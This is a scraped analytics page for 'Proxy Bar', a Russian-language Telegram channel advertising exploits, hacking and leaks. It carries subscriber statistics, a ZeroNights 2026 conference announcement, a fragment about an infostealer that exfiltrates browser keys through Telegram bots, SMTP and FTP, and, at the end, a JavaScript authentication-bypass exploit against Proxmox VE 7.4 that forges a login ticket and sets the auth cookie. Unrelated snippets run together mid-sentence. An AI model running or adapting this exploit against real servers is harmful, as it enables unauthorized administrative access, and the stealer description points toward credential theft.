Proxy Bar
Exploits, Hacking and Leaks Чат группы - https://t.me/ Связь с администрацией и реклама: @NULL_vm Поддержать проект: BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Show more📈 Analytical overview of Telegram channel Proxy Bar
Channel Proxy Bar (@proxy_bar) in the Russian language segment is an active participant. Currently, the community unites 21 421 subscribers, ranking 6 006 in the Technologies & Applications category and 30 480 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 21 421 subscribers.
According to the latest data from 19 September, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 226 over the last 30 days and by 3 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 38.72%. Within the first 24 hours after publication, content typically collects 14.34% reactions from the total number of subscribers.
- Post reach: On average, each post receives 8 293 views. Within the first day, a publication typically gains 3 072 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 38.
- Thematic interests: Content is focused on key topics such as cve-2025, exploit, linux, birth, define.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Exploits, Hacking and Leaks
Чат группы - https://t.me/
Связь с администрацией и реклама:
@NULL_vm
Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker”
Thanks to the high frequency of updates (latest data received on 20 September, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
ZeroNights 2026 уже опубликована.
В этом году спикеры будут выступать на 3-х основных сценах по 2-м направлениям:
** Offensive Track (сцены Heap и Stack) – использование современных техник взлома для проведения продвинутых кибератак, обнаружения уязвимостей, а также вопросы бинарной эксплуатации;
** SecOps Track – реальные кейсы SecOps, стратегия AppSec и рабочие подходы к безопасной разработке;
Кроме того, будет и четвертая сцена – Community Hab, секция для интерактивных докладов от ИБ-сообществ, сопровождающихся тематическими воркшопами и локпикингом.
Глянуть что в программе
Купить билетик
Дата: 30.09.2026
Место проведения: Санкт-Петербург, LOFT#7
Организаторы конференции: команда DSEC by Solar (бывшая Digital Security, входит в ГК «Солар»).
Встретимся на конференции !os_crypt / app_bound_encrypted_key.
Из интересного - эксфильтрация сразу через Telegram Bot, SMTP и FTP, плюс немного реверса через Binary Ninja / x64dbg.
*
Reverse engineering analysis// PVE 7.4 auth-bypass @NebuSec 2026
// First, make sure to try logging in as root with this exact password: root@pam
(async () => {
const form = new URLSearchParams({
username: "root@pam",
password: "root@pam",
"tfa-challenge": "NEBUSEC-CHALLENGE",
});
const loginResponse = await fetch("/api2/json/access/ticket", {
method: "POST",
credentials: "omit",
headers: { "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8" },
body: form,
});
const loginBody = await loginResponse.json();
document.cookie = `PVEAuthCookie=${loginBody?.data?.ticket}; Path=/; Secure; SameSite=Strict`;
location.reload()
})();